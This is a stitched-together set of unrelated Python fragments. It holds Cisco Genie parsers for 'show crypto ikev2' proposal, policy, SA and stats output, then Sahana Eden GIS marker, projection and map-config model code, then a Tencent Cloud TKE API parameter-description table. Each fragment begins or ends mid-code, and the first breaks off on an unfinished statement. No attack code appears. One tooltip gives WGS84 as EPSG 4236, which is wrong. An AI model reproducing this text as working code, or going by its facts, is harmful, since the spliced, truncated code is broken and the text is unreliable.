}
# =================================================
# Parser for
# Parser for 'show crypto ikev2 proposal'
# =================================================
class ShowCryptoIkev2Proposal(ShowCryptoIkev2ProposalSchema):
"""Parser for show crypto ikev2 proposal"""
cli_command = ['show crypto ikev2 proposal']
def cli(self, output=None):
if output is None:
output = self.device.execute(self.cli_command[0])
# initial return dictionary
ret_dict = {}
# IKEv2 proposal: default
p1 = re.compile(r'^IKEv2 proposal\s*:\s*(?P<proposal_name>.*)$')
# Encryption : AES-CBC-256
p2 = re.compile(r'^Encryption\s*:\s*(?P<encryption>[\w-]+)$')
# Integrity : SHA512 SHA384
p3 = re.compile(r'^Integrity\s*:\s*(?P<integrity>.*)$')
# PRF : SHA512 SHA384
p4 = re.compile(r'^PRF\s*:\s*(?P<prf>.*)$')
# DH Group : DH_GROUP_256_ECP/Group 19 DH_GROUP_2048_MODP/Group 14 DH_GROUP_521_ECP/Group 21 DH_GROUP_1536_MODP/Group 5
p5 = re.compile(r'^DH Group\s*:\s*(?P<dh_group>.*)$')
ret_dict = {}
for line in output.splitlines():
line = line.strip()
# IKEv2 proposal: default
m = p1.match(line)
if m:
groups = m.groupdict()
proposal_name = groups['proposal_name']
proposal_name_dict = ret_dict.setdefault('proposal_name',{}).setdefault(proposal_name,{})
continue
# Encryption : AES-CBC-256
m = p2.match(line)
if m:
groups = m.groupdict()
encryption = groups['encryption']
proposal_name_dict['encryption'] = encryption
continue
# Integrity : SHA512 SHA384
m = p3.match(line)
if m:
groups = m.groupdict()
integrity = groups['integrity']
proposal_name_dict['integrity'] = integrity
continue
# PRF : SHA512 SHA384
m = p4.match(line)
if m:
groups = m.groupdict()
prf = groups['prf']
proposal_name_dict['prf'] = prf
continue
# DH Group : DH_GROUP_256_ECP/Group 19 DH_GROUP_2048_MODP/Group 14 DH_GROUP_521_ECP/Group 21 DH_GROUP_1536_MODP/Group 5
m = p5.match(line)
if m:
l2 = ''
groups = m.groupdict()
dh_group = groups['dh_group']
dh_group = dh_group.split()
dh_group_list = []
for i in range(len(dh_group)):
if i==0 or i%2==0:
l2 = l2+dh_group[i]
else:
l2 = l2+' '+dh_group[i]
dh_group_list.append(l2)
l2 = ''
proposal_name_dict['dh_group'] = dh_group_list
continue
return ret_dict
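# Illustrative usage sketch (the device name and output below are assumptions, not
# taken from this module): with a connected pyATS/Genie device the parser is
# normally invoked through device.parse(), which dispatches to the cli() method
# defined above.
#
#   parsed = device.parse('show crypto ikev2 proposal')
#   # e.g. parsed['proposal_name']['default']['encryption'] -> 'AES-CBC-256'
#   # and parsed['proposal_name']['default']['dh_group'] is a list such as
#   # ['DH_GROUP_256_ECP/Group 19', 'DH_GROUP_2048_MODP/Group 14']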
# =================================================
# Schema for
# Schema for 'show crypto ikev2 policy'
# =================================================
class ShowCryptoIkev2PolicySchema(MetaParser):
"""Schema for show crypto ikev2 policy"""
schema = {
'policy_name':{
Any(): {
'match_fvrf': str,
'match_address_local': str,
'proposal': str,
}
},
}
# =================================================
# Parser for
# Parser for 'show crypto ikev2 policy'
# =================================================
class ShowCryptoIkev2Policy(ShowCryptoIkev2PolicySchema):
"""Parser for show crypto ikev2 policy"""
cli_command = ['show crypto ikev2 policy']
def cli(self, output=None):
if output is None:
output = self.device.execute(self.cli_command[0])
# initial return dictionary
ret_dict = {}
# IKEv2 policy : ikev2policy
p1 = re.compile(r'^IKEv2 policy\s*:\s*(?P<policy_name>.*)$')
# Match fvrf : global
p2 = re.compile(r'^Match fvrf\s*:\s*(?P<match_fvrf>\w+)$')
# Match address local : any
p3 = re.compile(r'^Match address local\s*:\s*(?P<match_address_local>\w+)$')
# Proposal : ikev2proposal
p4 = re.compile(r'^Proposal\s*:\s*(?P<proposal>.*)$')
ret_dict = {}
for line in output.splitlines():
line = line.strip()
# IKEv2 policy : ikev2policy
m = p1.match(line)
if m:
groups = m.groupdict()
policy_name = groups['policy_name']
policy_name_dict = ret_dict.setdefault('policy_name',{}).setdefault(policy_name,{})
continue
# Match fvrf : global
m = p2.match(line)
if m:
groups = m.groupdict()
match_fvrf = groups['match_fvrf']
policy_name_dict['match_fvrf'] = match_fvrf
continue
# Match address local : any
m = p3.match(line)
if m:
groups = m.groupdict()
match_address_local = groups['match_address_local']
policy_name_dict['match_address_local'] = match_address_local
continue
# Proposal : ikev2proposal
m = p4.match(line)
if m:
groups = m.groupdict()
proposal = groups['proposal']
policy_name_dict['proposal'] = proposal
continue
return ret_dict
# =================================================
# Schema for 'show crypto ikev2 sa '
# =================================================
class ShowCryptoIkev2SaSchema(MetaParser):
"""Schema for show crypto ikev2 sa"""
schema = {
'ipv4': {
Any(): {
'tunnel_id': int,
'local_ip': str,
'local_port': int,
'remote_ip': str,
'remote_port': int,
'fvrf': str,
'ivrf': str,
'status': str,
'encryption': str,
'keysize': int,
'prf': str,
'hash': str,
'dh_group': int,
'auth_sign': str,
'auth_verify': str,
'life_time': int,
'active_time': int,
Optional('ce_id'): int,
Optional('session_id'): int,
Optional('local_spi'): str,
Optional('remote_spi'): str,
}
},
'ipv6': {}
}
# =================================================
# Parser for 'show crypto ikev2 sa '
# =================================================
class ShowCryptoIkev2Sa(ShowCryptoIkev2SaSchema):
"""Parser for show crypto ikev2 sa"""
cli_command = ['show crypto ikev2 sa']
def cli(self, output=None):
if output is None:
output = self.device.execute(self.cli_command[0])
# initial return dictionary
ret_dict = {}
# IPv4 Crypto IKEv2 SA
p1 = re.compile(r'^IPv4 Crypto IKEv2 SA$')
# IPv6 Crypto IKEv2 SA
p2 = re.compile(r'^IPv6 Crypto IKEv2 SA$')
# 1 172.16.58.3/500 172.16.31.10/500 none/none READY
p3 = re.compile(r'^(?P<tunnel_id>\d+)\s+(?P<local_ip>[\w.]+)/(?P<local_port>\d+)\s+(?P<remote_ip>[\w.]+)/(?P<remote_port>\d+)\s+(?P<fvrf>\w+)/(?P<ivrf>\w+)\s+(?P<status>[\w]+)$')
# Encr: AES-CBC, keysize: 128, PRF: SHA1, Hash: SHA96, DH Grp:16, Auth sign: PSK, Auth verify: PSK
p4 = re.compile(r'^Encr:\s*(?P<encryption>[\w-]+),\s*keysize:\s*(?P<keysize>\d+),\s*PRF:\s*(?P<prf>\w+),\s*Hash:\s*(?P<hash>\w+),\s*DH Grp:(?P<dh_group>\d+),\s*Auth sign:\s*(?P<auth_sign>\w+),\s*Auth verify:\s*(?P<auth_verify>\w+)')
# Life/Active Time: 86400/735 sec
p5 = re.compile(r'^Life/Active Time:\s*(?P<life_time>\d+)/(?P<active_time>\d+)\s*sec$')
# CE id: 0, Session-id: 5206
p6 = re.compile(r'^CE id:\s*(?P<ce_id>\d+),\s*Session-id:\s*(?P<session_id>\d+)$')
# Local spi: 1F7B76961C3A77ED Remote spi: 1298FDE074BD724C
p7 = re.compile(r'^Local spi:\s*(?P<local_spi>[A-F\d]+)\s*Remote spi:\s*(?P<remote_spi>[A-F\d]+)$')
for line in output.splitlines():
line = line.strip()
# IPv4 Crypto IKEv2 SA
m = p1.match(line)
if m:
ipv4_ikev2_dict = ret_dict.setdefault('ipv4',{})
# IPv6 Crypto IKEv2 SA
m = p2.match(line)
if m:
ipv6_ikev2_dict = ret_dict.setdefault('ipv6',{})
            # 1 172.16.58.3/500 172.16.31.10/500 none/none READY
m = p3.match(line)
if m:
groups = m.groupdict()
tunnel_id = int(groups['tunnel_id'])
local_ip = groups['local_ip']
local_port = int(groups['local_port'])
remote_ip = groups['remote_ip']
remote_port = int(groups['remote_port'])
fvrf = groups['fvrf']
ivrf = groups['ivrf']
status = groups['status']
tunnel_dict = ipv4_ikev2_dict.setdefault(tunnel_id,{})
tunnel_dict['tunnel_id'] = tunnel_id
tunnel_dict['local_ip'] = local_ip
tunnel_dict['local_port'] = local_port
tunnel_dict['remote_ip'] = remote_ip
tunnel_dict['remote_port'] = remote_port
tunnel_dict['fvrf'] = fvrf
tunnel_dict['ivrf'] = ivrf
tunnel_dict['status'] = status
# Encr: AES-CBC, keysize: 128, PRF: SHA1, Hash: SHA96, DH Grp:16, Auth sign: PSK, Auth verify: PSK
m = p4.match(line)
if m:
groups = m.groupdict()
encryption = groups['encryption']
keysize = int(groups['keysize'])
prf = groups['prf']
hash = groups['hash']
dh_group = int(groups['dh_group'])
auth_sign = groups['auth_sign']
auth_verify = groups['auth_verify']
tunnel_dict['encryption'] = encryption
tunnel_dict['keysize'] = keysize
tunnel_dict['prf'] = prf
tunnel_dict['hash'] = hash
tunnel_dict['dh_group'] = dh_group
tunnel_dict['auth_sign'] = auth_sign
tunnel_dict['auth_verify'] = auth_verify
# Life/Active Time: 86400/735 sec
m = p5.match(line)
if m:
groups = m.groupdict()
life_time = int(groups['life_time'])
active_time = int(groups['active_time'])
tunnel_dict['life_time'] = life_time
tunnel_dict['active_time'] = active_time
# CE id: 0, Session-id: 5206
m = p6.match(line)
if m:
groups = m.groupdict()
ce_id = int(groups['ce_id'])
session_id = int(groups['session_id'])
tunnel_dict['ce_id'] = ce_id
tunnel_dict['session_id'] = session_id
# Local spi: 1F7B76961C3A77ED Remote spi: 1298FDE074BD724C
m = p7.match(line)
if m:
groups = m.groupdict()
local_spi = groups['local_spi']
remote_spi = groups['remote_spi']
tunnel_dict['local_spi'] = local_spi
tunnel_dict['remote_spi'] = remote_spi
return ret_dict
# =================================================
# Schema for
# Schema for 'show crypto ikev2 stats exchange'
# =================================================
class ShowCryptoIkev2StatsExchangeSchema(MetaParser):
"""Schema for show crypto ikev2 stats exchange"""
schema = {
'exchanges':{
Any(): {
'transmit_request': int,
'transmit_response': int,
'received_request': int,
'received_response': int
}
},
'error_notify': {
Any(): {
'transmit_request': int,
'transmit_response': int,
'received_request': int,
'received_response': int
}
},
'other_notify': {
Any(): {
'transmit_request': int,
'transmit_response': int,
'received_request': int,
'received_response': int
}
},
'config_request': {
Any(): {
'transmit': int,
'received': int
}
},
'other_counters': {
'nat_inside': int,
'no_nat': int
}
}
# =================================================
# Parser for
# Parser for 'show crypto ikev2 stats exchange'
# =================================================
class ShowCryptoIkev2StatsExchange(ShowCryptoIkev2StatsExchangeSchema):
"""Parser for show crypto ikev2 stats exchange"""
cli_command = ['show crypto ikev2 stats exchange']
def cli(self, output=None):
if output is None:
output = self.device.execute(self.cli_command[0])
# initial return dictionary
ret_dict = {}
# EXCHANGES
p1 = re.compile(r'^EXCHANGES$')
p1_a = re.compile(r'^ERROR NOTIFY$')
p1_b = re.compile(r'^OTHER NOTIFY$')
p1_c = re.compile(r'^CONFIG PAYLOAD TYPE TX RX$')
p1_d = re.compile(r'^OTHER COUNTERS$')
# IKE_SA_INIT 8618 0 0 5206
p2 = re.compile(r'^(?P<message>\w+)\s+(?P<tx_req>\d+)\s+(?P<tx_res>\d+)\s+(?P<rx_req>\d+)\s+(?P<rx_res>\d+)$')
# CFG_REQUEST 5206 0
p3 = re.compile(r'^(?P<message>\w+)\s+(?P<tx>\d+)\s+(?P<rx>\d+)$')
# NAT_INSIDE 3
p4 = re.compile(r'^(?P<message>\w+)\s+(?P<count>\d+)$')
ret_dict = {}
exchnge_flag = 0
error_notify_flag = 0
other_notify_flag = 0
for line in output.splitlines():
line = line.strip()
# EXCHANGES
m = p1.match(line)
if m:
exchnge_flag = 1
exchange_dict = ret_dict.setdefault('exchanges',{})
continue
# ERROR NOTIFY
m = p1_a.match(line)
if m:
exchnge_flag = 0
error_notify_flag = 1
other_notify_flag = 0
error_dict = ret_dict.setdefault('error_notify',{})
continue
# OTHER NOTIFY
m = p1_b.match(line)
if m:
exchnge_flag = 0
error_notify_flag = 0
other_notify_flag = 1
notify_dict = ret_dict.setdefault('other_notify',{})
continue
# CONFIG PAYLOAD TYPE TX RX
m = p1_c.match(line)
if m:
exchnge_flag = 0
error_notify_flag = 0
other_notify_flag = 0
config_dict = ret_dict.setdefault('config_request',{})
continue
# OTHER COUNTERS
m = p1_d.match(line)
if m:
exchnge_flag = 0
error_notify_flag = 0
other_notify_flag = 0
other_dict = ret_dict.setdefault('other_counters',{})
continue
# IKE_SA_INIT 8618 0 0 5206
m = p2.match(line)
if m:
groups = m.groupdict()
tx_req = int(groups['tx_req'])
tx_res = int(groups['tx_res'])
rx_req = int(groups['rx_req'])
rx_res = int(groups['rx_res'])
if exchnge_flag:
exchange_counter_dict = exchange_dict.setdefault(groups['message'].lower(),{})
exchange_counter_dict['transmit_request'] = tx_req
exchange_counter_dict['transmit_response'] = tx_res
exchange_counter_dict['received_request'] = rx_req
exchange_counter_dict['received_response'] = rx_res
if error_notify_flag:
error_counter_dict = error_dict.setdefault(groups['message'].lower(),{})
error_counter_dict['transmit_request'] = tx_req
error_counter_dict['transmit_response'] = tx_res
error_counter_dict['received_request'] = rx_req
error_counter_dict['received_response'] = rx_res
if other_notify_flag:
notify_counter_dict = notify_dict.setdefault(groups['message'].lower(),{})
notify_counter_dict['transmit_request'] = tx_req
notify_counter_dict['transmit_response'] = tx_res
notify_counter_dict['received_request'] = rx_req
notify_counter_dict['received_response'] = rx_res
continue
# CFG_REQUEST 5206 0
m = p3.match(line)
if m:
groups = m.groupdict()
tx = int(groups['tx'])
rx = int(groups['rx'])
config_counter_dict = config_dict.setdefault(groups['message'].lower(),{})
config_counter_dict['transmit'] = tx
config_counter_dict['received'] = rx
continue
m | |
% (
T("Is this a strict hierarchy?"),
T("Select this if all specific locations need a parent at the deepest level of the location hierarchy. For example, if 'district' is the smallest division in the hierarchy, then all specific locations would be required to have a district as a parent.")))
table.location_parent_required.label = T("Must a location have a parent location?")
table.location_parent_required.comment = DIV(
_class="tooltip",
_title="%s|%s" % (
T("Must a location have a parent location?"),
T("Select this if all specific locations need a parent location in the location hierarchy. This can assist in setting up a 'region' representing an affected area.")))
edit_Ln_tip_1 = T("Set True to allow editing this level of the location hierarchy by users who are not MapAdmins.")
edit_Ln_tip_2 = T("This is appropriate if this level is under construction. To prevent accidental modification after this level is complete, this can be set to False.")
max_allowed_level_num = current.gis.max_allowed_level_num
for n in range(1, max_allowed_level_num):
field = "edit_L%d" % n
table[field].label = T("Edit Level %d Locations?") % n
table[field].comment = DIV(
_class="tooltip",
_title="%s|%s|%s" % (
T("Is editing level L%d locations allowed?") % n,
edit_Ln_tip_1,
edit_Ln_tip_2
)
)
# -------------------------------------------------------------------------
@staticmethod
def gis_hierarchy_onvalidation(form):
"""
If strict, hierarchy names must not have gaps.
"""
form_vars = form.vars
if form_vars.strict_hierarchy:
gis = current.gis
hierarchy_level_keys = gis.hierarchy_level_keys
level_names = [form_vars[key] if key in form_vars else None
for key in hierarchy_level_keys]
# L0 is always missing because its label is hard-coded
            gaps = ["L%d" % n
                    for n in range(1, gis.max_allowed_level_num)
                    if not level_names[n] and level_names[n + 1]]
if gaps:
hierarchy_gap = current.T("A strict location hierarchy cannot have gaps.")
for gap in gaps:
form.errors[gap] = hierarchy_gap
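    # Illustrative example of the gap check above (assumed form values): if a
    # strict hierarchy defines L2 = "District" but leaves L1 blank, then "L1" is
    # reported as a gap and form.errors["L1"] is set to the strict-hierarchy
    # message, so the form cannot be accepted until L1 is named.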
# =============================================================================
class S3GISConfigModel(S3Model):
"""
GIS Config model: Web Map Context
- Site config
- Personal config
- OU config (Organisation &/or Team)
"""
names = ("gis_config",
"gis_menu",
"gis_marker",
"gis_projection",
"gis_config_id",
"gis_marker_id",
"gis_projection_id",
"gis_config_form_setup",
)
def model(self):
T = current.T
db = current.db
gis = current.gis
location_id = self.gis_location_id
settings = current.deployment_settings
NONE = current.messages["NONE"]
# Shortcuts
add_components = self.add_components
configure = self.configure
crud_strings = current.response.s3.crud_strings
define_table = self.define_table
super_link = self.super_link
# =====================================================================
# GIS Markers (Icons)
tablename = "gis_marker"
define_table(tablename,
Field("name", length=64, notnull=True, unique=True,
label = T("Name"),
),
# If-needed, then Symbology should be here
#symbology_id(),
Field("image", "upload", autodelete=False,
custom_retrieve = gis_marker_retrieve,
custom_retrieve_file_properties = gis_marker_retrieve_file_properties,
label = T("Image"),
represent = lambda filename: \
(filename and [DIV(IMG(_src=URL(c="static",
f="img",
args=["markers",
filename]),
_height=40))] or [""])[0],
# upload folder needs to be visible to the download() function as well as the upload
uploadfolder = os.path.join(current.request.folder,
"static",
"img",
"markers"),
widget = S3ImageCropWidget((50, 50)),
),
# We could get size client-side using Javascript's Image() class, although this is unreliable!
Field("height", "integer", # In Pixels, for display purposes
writable = False,
),
Field("width", "integer",
writable = False,
),
*s3_meta_fields())
# CRUD Strings
ADD_MARKER = T("Create Marker")
crud_strings[tablename] = Storage(
label_create = ADD_MARKER,
title_display = T("Marker Details"),
title_list = T("Markers"),
title_update = T("Edit Marker"),
label_list_button = T("List Markers"),
label_delete_button = T("Delete Marker"),
msg_record_created = T("Marker added"),
msg_record_modified = T("Marker updated"),
msg_record_deleted = T("Marker deleted"),
msg_list_empty = T("No Markers currently available"))
# Reusable field to include in other table definitions
# @ToDo: Widget to include icons in dropdown: http://jqueryui.com/selectmenu/#custom_render
marker_represent = gis_MarkerRepresent()
marker_id = S3ReusableField("marker_id", "reference %s" % tablename,
label = T("Marker"),
ondelete = "SET NULL",
represent = marker_represent,
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "gis_marker.id",
"%(name)s",
zero=T("Use default"))),
sortby = "name",
widget = S3SelectWidget(icons=self.gis_marker_options),
comment=S3PopupLink(c = "gis",
f = "marker",
#vars = {"child": "marker_id",
# "parent": "symbology"},
label = ADD_MARKER,
title = T("Marker"),
tooltip = "%s|%s|%s" % (T("Defines the icon used for display of features on interactive map & KML exports."),
T("A Marker assigned to an individual Location is set if there is a need to override the Marker assigned to the Feature Class."),
T("If neither are defined, then the Default Marker is used.")),
),
)
# Components
#add_components(tablename,
# gis_layer_entity = {"link": "gis_style",
# "joinby": "marker_id",
# "key": "layer_id",
# "actuate": "hide",
# "autocomplete": "name",
# "autodelete": False,
# },
# )
configure(tablename,
deduplicate = self.gis_marker_deduplicate,
onvalidation = self.gis_marker_onvalidation,
)
# =====================================================================
# GIS Projections
tablename = "gis_projection"
proj4js = T("%(proj4js)s definition") % dict(proj4js="Proj4js")
define_table(tablename,
Field("name", length=64, notnull=True, unique=True,
label = T("Name"),
),
Field("epsg", "integer", notnull=True,
label = "EPSG",
requires = IS_NOT_EMPTY(),
),
Field("maxExtent", length=64, notnull=True,
label = T("Maximum Extent"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (T("Maximum Extent"),
T("The Maximum valid bounds, in projected coordinates"))),
# @ToDo: Add a specialised validator
requires = IS_NOT_EMPTY(),
),
Field("proj4js",
label = proj4js,
comment = DIV(_class="stickytip",
_title="%s|%s" % (proj4js,
T("String used to configure Proj4js. Can be found from %(url)s") % dict(url=A("http://spatialreference.org",
_href="http://spatialreference.org",
_target="_blank")))),
),
Field("units", notnull=True,
label = T("Units"),
requires = IS_IN_SET(["m", "degrees"],
zero=None),
),
*s3_meta_fields())
# CRUD Strings
ADD_PROJECTION = T("Create Projection")
crud_strings[tablename] = Storage(
label_create = ADD_PROJECTION,
title_display = T("Projection Details"),
title_list = T("Projections"),
title_update = T("Edit Projection"),
label_list_button = T("List Projections"),
label_delete_button = T("Delete Projection"),
msg_record_created = T("Projection added"),
msg_record_modified = T("Projection updated"),
msg_record_deleted = T("Projection deleted"),
msg_list_empty = T("No Projections currently defined"))
# Reusable field to include in other table definitions
represent = S3Represent(lookup=tablename)
projection_id = S3ReusableField("projection_id", "reference %s" % tablename,
sortby="name",
requires = IS_EMPTY_OR(
IS_ONE_OF(db, "gis_projection.id",
represent)),
represent = represent,
label = T("Projection"),
comment=S3PopupLink(c = "gis",
f = "projection",
label = ADD_PROJECTION,
title = T("Projection"),
tooltip = "%s|%s|%s" % (T("The system supports 2 projections by default:"),
T("Spherical Mercator (900913) is needed to use OpenStreetMap/Google/Bing base layers."),
T("WGS84 (EPSG 4236) is required for many WMS servers.")),
),
ondelete = "RESTRICT")
configure(tablename,
deduplicate = self.gis_projection_deduplicate,
deletable = False,
)
# =====================================================================
# GIS Config
#
# uuid==SITE_DEFAULT => Site default settings
#
# @ToDo: Settings that apply will be the Site Settings modified
# according to any active Event or Region config and any OU or
# Personal config found
org_group_label = settings.get_org_groups()
org_site_label = settings.get_org_site_label()
teams_label = settings.get_hrm_teams()
pe_types = {1: T("Person"),
2: T(teams_label),
4: T(org_site_label),
7: T("Organization"),
9: "SITE_DEFAULT",
}
if settings.get_org_branches():
pe_types[6] = T("Branch")
if org_group_label:
pe_types[8] = T(org_group_label)
tablename = "gis_config"
define_table(tablename,
# Name displayed in the GIS config menu.
Field("name"),
# pe_id for Personal/OU configs
super_link("pe_id", "pr_pentity"),
# Gets populated onvalidation
Field("pe_type", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(pe_types)),
readable = False,
writable = False,
),
# Default:
# If a person has multiple saved configs then this decides
# which is the one to use
Field("pe_default", "boolean",
default = False,
),
# Region field
location_id("region_location_id",
requires = IS_EMPTY_OR(IS_LOCATION(level=gis.hierarchy_level_keys)),
widget = S3LocationAutocompleteWidget(),
),
# CRUD Settings
# Default Location
location_id("default_location_id",
requires = IS_EMPTY_OR(IS_LOCATION()),
widget = S3LocationAutocompleteWidget(),
),
# Map Settings
Field("zoom", "integer",
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(1, 20)),
),
Field("lat", "double",
requires = IS_EMPTY_OR(IS_LAT()),
),
Field("lon", "double",
requires = IS_EMPTY_OR(IS_LON()),
),
projection_id(#empty=False,
# Nice if we could get this set to epsg field
#default=900913
),
#symbology_id(),
# Overall Bounding Box for sanity-checking inputs
Field("lat_min", "double",
# @ToDo: Remove default once we have cascading working
default = -90,
requires = IS_EMPTY_OR(IS_LAT()),
),
Field("lat_max", "double",
# @ToDo: Remove default once we have cascading working
default = 90,
requires = IS_EMPTY_OR(IS_LAT()),
),
Field("lon_min", "double",
# @ToDo: Remove default once we have cascading working
default = -180,
requires = IS_EMPTY_OR(IS_LON()),
),
Field("lon_max", "double",
# @ToDo: Remove default once we have cascading working
default = 180,
requires = IS_EMPTY_OR(IS_LON()),
),
# This should be turned off for Offline deployments or expensive SatComms, such as BGAN
Field("geocoder", "boolean"),
# Whether the config is just temporary for taking a screenshot
Field("temp", "boolean",
default = False,
readable = False,
writable = False,
),
Field("wmsbrowser_url"),
Field("wmsbrowser_name",
default = "Web Map Service",
),
# Note: This hasn't yet been changed for any instance
# Do we really need it to be configurable?
Field("zoom_levels", "integer",
# @ToDo: Remove default once we have cascading working
default = 22,
requires = IS_EMPTY_OR(IS_INT_IN_RANGE(1, 30)),
readable = False,
writable = False,
),
Field("image", "upload", autodelete=False,
custom_retrieve = gis_marker_retrieve,
custom_retrieve_file_properties = gis_marker_retrieve_file_properties,
label = T("Image"),
represent = lambda filename: \
| |
# -*- coding: utf-8 -*-
DESC = "tke-2018-05-25"
INFO = {
"CreateCluster": {
"params": [
{
"name": "ClusterCIDRSettings",
"desc": "Container networking configuration information for the cluster"
},
{
"name": "ClusterType",
"desc": "Cluster type. Managed cluster: MANAGED_CLUSTER; self-deployed cluster: INDEPENDENT_CLUSTER."
},
{
"name": "RunInstancesForNode",
"desc": "Pass-through parameter for CVM creation in the format of a JSON string. For more information, see the API for [creating a CVM instance](https://cloud.tencent.com/document/product/213/15730)."
},
{
"name": "ClusterBasicSettings",
"desc": "Basic configuration information of the cluster"
},
{
"name": "ClusterAdvancedSettings",
"desc": "Advanced configuration information of the cluster"
},
{
"name": "InstanceAdvancedSettings",
"desc": "Advanced configuration information of the node"
},
{
"name": "ExistedInstancesForNode",
"desc": "Configuration information of an existing instance"
},
{
"name": "InstanceDataDiskMountSettings",
"desc": "CVM type and the corresponding data disk mounting configuration information."
}
],
"desc": "This API is used to create a cluster."
},
"DescribeImages": {
"params": [],
"desc": "This API is used to get image information."
},
"ModifyClusterAsGroupAttribute": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "ClusterAsGroupAttribute",
"desc": "Cluster-associated scaling group attributes"
}
],
"desc": "Modify cluster scaling group attributes"
},
"DeleteClusterEndpoint": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "IsExtranet",
"desc": "Whether public network access is enabled or not (True = public network access, FALSE = private network access, with the default value as FALSE)."
}
],
"desc": "Delete the cluster access port (intranet / extranet access is enabled for independent clusters, and intranet access is supported for managed clusters)"
},
"CreateClusterInstances": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID. Enter the ClusterId field returned by the DescribeClusters API"
},
{
"name": "RunInstancePara",
"desc": "Pass-through parameter for CVM creation in the format of a JSON string. For more information, see the [RunInstances](https://cloud.tencent.com/document/product/213/15730) API."
},
{
"name": "InstanceAdvancedSettings",
"desc": "Additional parameter to be set for the instance"
}
],
"desc": "This API is used to create one or more nodes in a cluster."
},
"ModifyClusterAttribute": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "ProjectId",
"desc": "Project of the Cluster"
},
{
"name": "ClusterName",
"desc": "Cluster name"
},
{
"name": "ClusterDesc",
"desc": "Cluster description"
}
],
"desc": "This API is used to modify cluster attributes."
},
"DeleteClusterAsGroups": {
"params": [
{
"name": "ClusterId",
"desc": "The cluster ID, obtained through the [DescribeClusters](https://cloud.tencent.com/document/api/457/31862) API."
},
{
"name": "AutoScalingGroupIds",
"desc": "Cluster scaling group ID list"
},
{
"name": "KeepInstance",
"desc": "Whether to keep nodes in the scaling group. Default to **false** (not keep)"
}
],
"desc": "Delete a cluster scaling group"
},
"DeleteClusterRoute": {
"params": [
{
"name": "RouteTableName",
"desc": "Route table name."
},
{
"name": "GatewayIp",
"desc": "Next hop address."
},
{
"name": "DestinationCidrBlock",
"desc": "Destination CIDR."
}
],
"desc": "This API is used to delete a cluster route."
},
"DescribeClusterEndpointVipStatus": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
}
],
"desc": "Query cluster open port process status (only supports external ports of the managed cluster)"
},
"DeleteCluster": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "InstanceDeleteMode",
"desc": "Policy used to delete an instance in the cluster: terminate (terminates the instance. Only available for instances on pay-as-you-go CVMs); retain (only removes it from the cluster. The instance will be retained.)"
},
{
"name": "ResourceDeleteOptions",
"desc": "Specifies the policy to deal with resources in the cluster when the cluster is deleted. It only supports CBS now. The default policy is to retain CBS disks."
}
],
"desc": "This API is used to delete a cluster. (Cloud API v3)."
},
"CreateClusterAsGroup": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "AutoScalingGroupPara",
"desc": "The pass-through parameters for scaling group creation, in the format of a JSON string. For more information, see the [CreateAutoScalingGroup](https://cloud.tencent.com/document/api/377/20440) API. The **LaunchConfigurationId** is created with the LaunchConfigurePara parameter, which does not support data entry."
},
{
"name": "LaunchConfigurePara",
"desc": "The pass-through parameters for launch configuration creation, in the format of a JSON string. For more information, see the [CreateLaunchConfiguration](https://cloud.tencent.com/document/api/377/20447) API. **ImageId** is not required as it is already included in the cluster dimension. **UserData** is not required as it’s set through the **UserScript**."
},
{
"name": "InstanceAdvancedSettings",
"desc": "Advanced configuration information of the node"
},
{
"name": "Labels",
"desc": "Node label array"
}
],
"desc": "Create a scaling group for an existing cluster"
},
"DescribeExistedInstances": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID. Enter the `ClusterId` field returned when you call the DescribeClusters API (Only VPC ID obtained through `ClusterId` need filtering conditions. When comparing statuses, the nodes on all clusters in this region will be used for comparison. You cannot specify `InstanceIds` and `ClusterId` at the same time.)"
},
{
"name": "InstanceIds",
"desc": "Query by one or more instance ID(s). Instance ID format: ins-xxxxxxxx. (Refer to section ID.N of the API overview for this parameter’s specific format.) Up to 100 instances are allowed for each request. You cannot specify InstanceIds and Filters at the same time."
},
{
"name": "Filters",
"desc": "Filter condition. For fields and other information, see [the DescribeInstances API](https://cloud.tencent.com/document/api/213/15728). If a ClusterId has been set, then the cluster’s VPC ID will be attached as a query field. In this situation, if a \"vpc-id\" is specified in Filter, then the specified VPC ID must be consistent with the cluster’s VPC ID."
},
{
"name": "VagueIpAddress",
"desc": "Filter by instance IP (Supports both private and public IPs)"
},
{
"name": "VagueInstanceName",
"desc": "Filter by instance name"
},
{
"name": "Offset",
"desc": "Offset. Default value: 0. For more information on Offset, see the relevant section in the API [Introduction](https://cloud.tencent.com/document/api/213/15688)."
},
{
"name": "Limit",
"desc": "Number of returned results. Default value: 20. Maximum value: 100. For more information on Limit, see the relevant section in the API [Introduction](https://cloud.tencent.com/document/api/213/15688)."
}
],
"desc": "This API is used to query one or more existing node and determine whether they can be added to a cluster."
},
"CreateClusterRouteTable": {
"params": [
{
"name": "RouteTableName",
"desc": "Route table name"
},
{
"name": "RouteTableCidrBlock",
"desc": "Route table CIDR"
},
{
"name": "VpcId",
"desc": "VPC bound to the route table"
},
{
"name": "IgnoreClusterCidrConflict",
"desc": "Whether to ignore CIDR conflicts"
}
],
"desc": "This API is used to create a cluster route table."
},
"DescribeClusterAsGroupOption": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
}
],
"desc": "Cluster auto scaling configuration"
},
"DescribeClusters": {
"params": [
{
"name": "ClusterIds",
"desc": "Cluster ID list (When it is empty,\nall clusters under the account will be obtained)"
},
{
"name": "Offset",
"desc": "Offset. Default value: 0"
},
{
"name": "Limit",
"desc": "Maximum number of output entries. Default value: 20"
},
{
"name": "Filters",
"desc": "Filter condition. Currently, only filtering by a single ClusterName is supported"
}
],
"desc": "This API is used to query clusters list."
},
"DescribeClusterEndpointStatus": {
"params": [
{
"name": "ClusterId",
"desc": "Cluster ID"
},
{
"name": "IsExtranet",
"desc": "Whether public network access is enabled or not (True = public network access, FALSE = private network access, with the default value as FALSE)."
}
],
